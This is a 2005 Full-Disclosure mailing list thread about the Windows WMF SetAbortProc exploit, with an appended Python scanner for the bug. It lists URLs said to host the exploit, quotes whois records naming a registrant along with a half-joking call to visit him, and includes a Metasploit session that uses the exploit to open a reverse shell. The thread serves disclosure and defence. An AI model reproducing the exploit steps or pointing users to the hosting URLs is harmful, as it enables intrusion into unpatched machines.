-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I think you shouldn't be a security specialist for putting crackz.ws in your banned website list, hehehe. This is probably the funniest warez site around, and I bet these losers don't know the number of IE exploits they are hosting on their own domain lol...

Paul wrote:
> Indeed, this is quite an annoyance. Buytoolbar.biz/xpl.wmf also works. I
> sent it to Microsoft a few days ago and they're looking into it. It looks
> like it's going to be a bad week at MSRC :(
>
> I whois'd the owners of a couple of domains that host the image and got the
> following information:
>
> Domain Name: BEEHAPPYY.BIZ
> Domain ID: D9564716-BIZ
> Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
> Sponsoring Registrar IANA ID: 82
> Domain Status: ok
> Registrant ID: OLNIC_919328_0_0
> Registrant Name: Mikhail Sergeevich Gorbachev
> Registrant Organization: Mikhail Sergeevich Gorbachev
> Registrant Address1: Krasnaya ploshad, 1
> Registrant City: Moscow
> Registrant State/Province: Moscow
> Registrant Postal Code: 176098
> Registrant Country: Russian Federation
> Registrant Country Code: RU
> Registrant Phone Number: +7.0957643453
> Registrant Facsimile Number: +7.0957643453
> Registrant Email: [EMAIL PROTECTED]
> Administrative Contact ID: OLNIC_919328_1_0
> Administrative Contact Name: Mikhail Sergeevich Gorbachev
> Administrative Contact Organization: Mikhail Sergeevich Gorbachev
> Administrative Contact Address1: Krasnaya ploshad, 1
> Administrative Contact City: Moscow
> Administrative Contact State/Province: Moscow
> Administrative Contact Postal Code: 176098
> Administrative Contact Country: Russian Federation
> Administrative Contact Country Code: RU
> Administrative Contact Phone Number: +7.0957643453
> Administrative Contact Facsimile Number: +7.0957643453
> Administrative Contact Email: [EMAIL PROTECTED]
> Billing Contact ID: OLNIC_919328_3_0
> Billing Contact Name: Mikhail Sergeevich Gorbachev
> Billing Contact Organization: Mikhail Sergeevich Gorbachev
> Billing Contact Address1: Krasnaya ploshad, 1
> Billing Contact City: Moscow
> Billing Contact State/Province: Moscow
> Billing Contact Postal Code: 176098
> Billing Contact Country: Russian Federation
> Billing Contact Country Code: RU
> Billing Contact Phone Number: +7.0957643453
> Billing Contact Facsimile Number: +7.0957643453
> Billing Contact Email: [EMAIL PROTECTED]
> Technical Contact ID: OLNIC_919328_2_0
> Technical Contact Name: Mikhail Sergeevich Gorbachev
> Technical Contact Organization: Mikhail Sergeevich Gorbachev
> Technical Contact Address1: Krasnaya ploshad, 1
> Technical Contact City: Moscow
> Technical Contact State/Province: Moscow
> Technical Contact Postal Code: 176098
> Technical Contact Country: Russian Federation
> Technical Contact Country Code: RU
> Technical Contact Phone Number: +7.0957643453
> Technical Contact Facsimile Number: +7.0957643453
> Technical Contact Email: [EMAIL PROTECTED]
> Name Server: NS1.PERLINK.BIZ
> Name Server: NS2.PERLINK.BIZ
> Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
> Last Updated by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
> Domain Registration Date: Tue Apr 26 15:43:16 GMT 2005
> Domain Expiration Date: Wed Apr 25 23:59:59 GMT 2007
> Domain Last Updated Date: Thu Aug 11 02:33:14 GMT 2005
>
> The name Mikhail Sergeevich Gorbachev that this domain is registered to
> leads me to believe that it is registered with false information (for those
> of you who don't know, Gorbachev was a former Soviet president).
>
> Domain Name: BUYTOOLBAR.BIZ
> Domain ID: D11475548-BIZ
> Sponsoring Registrar: TLDS INC.
> Sponsoring Registrar IANA ID: 320
> Domain Status: clientTransferProhibited
> Registrant ID: 6464084-SRSPLUS
> Registrant Name: Ezhi Brozkevitsh
> Registrant Organization: Ezhi Brozkevitsh
> Registrant Address1: Al. Armii Ludowej 24
> Registrant City: Warszawa
> Registrant Postal Code: 00-609
> Registrant Country: Poland
> Registrant Country Code: PL
> Registrant Phone Number: +21.225798400
> Registrant Email: [EMAIL PROTECTED]
> Administrative Contact ID: 6464085-SRSPLUS
> Administrative Contact Name: Ezhi Brozkevitsh
> Administrative Contact Organization: Ezhi Brozkevitsh
> Administrative Contact Address1: Al. Armii Ludowej 24
> Administrative Contact City: Warszawa
> Administrative Contact Postal Code: 00-609
> Administrative Contact Country: Poland
> Administrative Contact Country Code: PL
> Administrative Contact Phone Number: +21.225798400
> Administrative Contact Email: [EMAIL PROTECTED]
> Billing Contact ID: 6464085-SRSPLUS
> Billing Contact Name: Ezhi Brozkevitsh
> Billing Contact Organization: Ezhi Brozkevitsh
> Billing Contact Address1: Al. Armii Ludowej 24
> Billing Contact City: Warszawa
> Billing Contact Postal Code: 00-609
> Billing Contact Country: Poland
> Billing Contact Country Code: PL
> Billing Contact Phone Number: +21.225798400
> Billing Contact Email: [EMAIL PROTECTED]
> Technical Contact ID: 6464086-SRSPLUS
> Technical Contact Name: Ezhi Brozkevitsh
> Technical Contact Organization: Ezhi Brozkevitsh
> Technical Contact Address1: Al. Armii Ludowej 24
> Technical Contact City: Warszawa
> Technical Contact Postal Code: 00-609
> Technical Contact Country: Poland
> Technical Contact Country Code: PL
> Technical Contact Phone Number: +21.225798400
> Technical Contact Email: [EMAIL PROTECTED]
> Name Server: NS1.BUYTOOLBAR.BIZ
> Name Server: NS2.BUYTOOLBAR.BIZ
> Created by Registrar: TLDS INC.
> Last Updated by Registrar: TLDS INC.
> Domain Registration Date: Mon Nov 14 08:00:27 GMT 2005
> Domain Expiration Date: Mon Nov 13 23:59:59 GMT 2006
> Domain Last Updated Date: Mon Nov 14 11:16:52 GMT 2005
>
> This information does look promising. Iframeurl.biz is also registered to
> the same individual. Perhaps the Polish authorities could apprehend this
> culprit (either that, or a Polish reader of full-disclosure could pay him a
> visit ;). That is, of course, assuming he is stupid enough to use his real
> name to register a domain for illegal use.
>
> Regards,
> Paul
> Greyhats Security
> http://greyhatsecurity.org
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Eric Sites
> Sent: Tuesday, December 27, 2005 11:02 PM
> To: [email protected]
> Subject: RE: [Full-disclosure] Someone wasted a nice bug on spyware...
>
> We are seeing a lot of websites picking this exploit up.
>
> Examples: DON'T CLICK
>
> Crackz.ws
> unionseek.com/d/t1/wmf_exp.htm
> beehappyy.biz/parthner3/xpl.wmf
> http://www.tfcco.com/xpl.wmf
> Iframeurl.biz
>
> Cheers,
>
> Eric Sites
> VP of Research & Development
> Sunbelt Software
>
> email: [EMAIL PROTECTED]
> Voice: 1-727-562-0101 x 276
> Cell: 1-727-637-2414
> Fax: 1-727-562-5199
> Web: http://www.sunbelt-software.com
> Physical Address:
> 101 N Garden Ave,
> Suite 120
> Clearwater, FL, 33755
> United States
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of H D Moore
> Sent: Tuesday, December 27, 2005 10:57 PM
> To: [email protected]
> Subject: [Full-disclosure] Someone wasted a nice bug on spyware...
>
> In reference to:
> http://www.securityfocus.com/archive/1/420288/30/0/threaded
>
> I ported the exploit to the Metasploit Framework in case anyone wants to
> test it without installing a thousand spyware apps...
>
> Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:
>
> --http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
> --http://metasploit.com/tools/framework-2.5-snapshot.tar.gz
>
> Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.
>
> -HD
>
> + -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]
>
> msf > use ie_xp_pfv_metafile
> msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
> PAYLOAD -> win32_reverse
> msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
> LHOST -> 192.168.0.2
> msf ie_xp_pfv_metafile(win32_reverse) > exploit
>
> [*] Starting Reverse Handler.
> [*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
> [*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
> [*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061
>
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
>
> C:\Documents and Settings\XXXX\Desktop>
>
> On Tuesday 27 December 2005 14:20, [EMAIL PROTECTED] wrote:
>> Warning: the following URL successfully exploited a fully patched
>> Windows XP system with a freshly updated Norton Anti-Virus.
>>
>> unionseek.com/d/t1/wmf_exp.htm
>>
>> The URL runs a .wmf and executes the virus; F-Secure will pick up the
>> virus, Norton will not.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ7MRVq+LRXunxpxfAQITRg//dSLUa67EmG/r0v+2/rN6QxmkrbdZ9oF9
2v089NF4Hc9Ms/BcH8u61ZHXXJ3Ht2nMNpbhucsxH58rT9pZyGNQzOFs1qBxsymn
/PHlIQPQuJrbLtODHDeTdnX+7WClRQdXkbysNzEEBJeFnvFlkNIHLMfizRqVKNS1
WRGftGKKGlvmQhVs9poIpYyUK5mirTU83L2sWQswFR6DcZj+yuvPnhpp4dRfsC2M
oMxwLMVe2eyZvtCZucdluVX6Z/jWfdC7ZTxzKyCrRlrkmmR6ItXP5HhVqq4hodhz
gG5KGx2Qa4DJS1kMw6mXMhg2OoWhaHEDHOv7S5XKINlPHaQzv/HxAssOdjjShxVZ
ZvmozA7odlWmSvlz6SkJYNZjxBDvzFvIg86SMXe/s3mh3zZuBbxVyQ9vEw0v8JA1
/500hCIQ2fM0jNzRbcYwFkzrWSTL/vWBTes3q6s4YLNx/XQfMZE+YSgFYcuGEqh1
0lDeNzu/J8E2mnfJLLe0qMMeRzXvZOIe4cU3kYHINzSl0XiSdwNylrKSVyIuWYc4
7eD41YD3LQIjhL+nWYG8pSdsyceQLrUO0+s0L5mQCkTFRpzJp5mag0DnU4IugfyI
wLSe3jesj3VOhQeeVgB4ZPdxrh3ukmqumJVKZhgdE4uVgsSuiNvWCyYigM0TCC18
TID7YC6EZD8=
=SY6l
-----END PGP SIGNATURE-----
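An added example, written here and not code from anyone in this thread, for triaging the .wmf files the posts above list without loading them in a viewer: it walks the metafile record chain and flags any META_ESCAPE record whose escape code is SETABORTPROC, on the assumption that the bug behind this thread (the one the SecurityFocus post and the ie_xp_pfv_metafile module refer to) is the SetAbortProc metafile-escape bug. The record and escape codes are those of the WMF format; the two sample files are constructed inline, not fetched from any host named above, and the eight 0xCC filler bytes stand in for whatever an exploit puts after the escape.

```python
"""Scan a Windows Metafile for a SETABORTPROC escape record.
Added example for the thread above; not code from any poster."""
import struct

PLACEABLE_MAGIC = 0x9AC6CDD7   # optional 22-byte Aldus placeable header
META_EOF = 0x0000
META_SETBKCOLOR = 0x0201       # benign record used in the constructed samples
META_ESCAPE = 0x0626           # WMF record that carries printer escapes
SETABORTPROC = 0x0009          # escape code: register an abort callback

# META_ESCAPE function word followed by the SETABORTPROC code, little-endian.
# Used as a fallback that does not trust the record size fields at all.
RAW_SIGNATURE = struct.pack("<HH", META_ESCAPE, SETABORTPROC)


def wmf_records(data):
    """Yield (offset, function, params) for each record, walking by size field."""
    off = 22 if (len(data) >= 22 and
                 struct.unpack_from("<I", data, 0)[0] == PLACEABLE_MAGIC) else 0
    if len(data) < off + 18:
        raise ValueError("truncated metafile header")
    _mtype, header_words, _version = struct.unpack_from("<HHH", data, off)
    if header_words != 9:
        raise ValueError("not a standard WMF header")
    off += header_words * 2
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        size = size_words * 2
        if size < 6 or off + size > len(data):
            # A hostile file can corrupt this field to trip a naive walker.
            raise ValueError("bad record size %d words at offset %d" % (size_words, off))
        yield off, func, data[off + 6:off + size]
        if func == META_EOF:
            return
        off += size


def scan_wmf(data):
    """Return findings: 'hits' are SETABORTPROC escape records found by the
    structured walk, 'raw_hits' are byte-pattern matches, 'malformed' is the
    parse error (if any) that stopped the walk."""
    result = {"hits": [], "raw_hits": [], "malformed": None}
    try:
        for off, func, params in wmf_records(data):
            if func == META_ESCAPE and len(params) >= 4:
                escape, count = struct.unpack_from("<HH", params, 0)
                if escape == SETABORTPROC:
                    result["hits"].append({"offset": off, "payload_len": count})
    except ValueError as exc:
        result["malformed"] = str(exc)
    pos = data.find(RAW_SIGNATURE)
    while pos != -1:
        result["raw_hits"].append(pos)
        pos = data.find(RAW_SIGNATURE, pos + 1)
    return result


# --- constructed sample files (not captured from the sites in the thread) ---

def _record(func, params=b""):
    if len(params) % 2:
        params += b"\x00"              # record sizes are counted in words
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def build_wmf(records):
    body = b"".join(records) + _record(META_EOF)
    max_words = max(len(r) for r in records) // 2
    # Type=1 (memory), HeaderSize=9 words, Version=0x300, Size, Objects, MaxRecord, Members
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, (18 + len(body)) // 2, 0, max_words, 0)
    return header + body


BENIGN_WMF = build_wmf([
    _record(META_SETBKCOLOR, struct.pack("<I", 0x00FFFFFF)),
    _record(META_ESCAPE, struct.pack("<HH", 0x0001, 0)),    # NEWFRAME escape, harmless
])
HOSTILE_WMF = build_wmf([
    _record(META_SETBKCOLOR, struct.pack("<I", 0x00FFFFFF)),
    # SETABORTPROC escape with 8 filler bytes where an exploit puts its code.
    _record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, 8) + b"\xcc" * 8),
])

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, scan_wmf(fh.read()))
    print("benign :", scan_wmf(BENIGN_WMF))
    print("hostile:", scan_wmf(HOSTILE_WMF))
```

Run it on a saved copy of a suspect file rather than fetching from the hosts listed above. The byte-pattern pass is kept separate from the structured walk on purpose: a file with a deliberately bad record size makes the walk stop with a `malformed` note, but the signature still surfaces in `raw_hits`, so a single corrupted length field does not turn a hit into a clean verdict.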
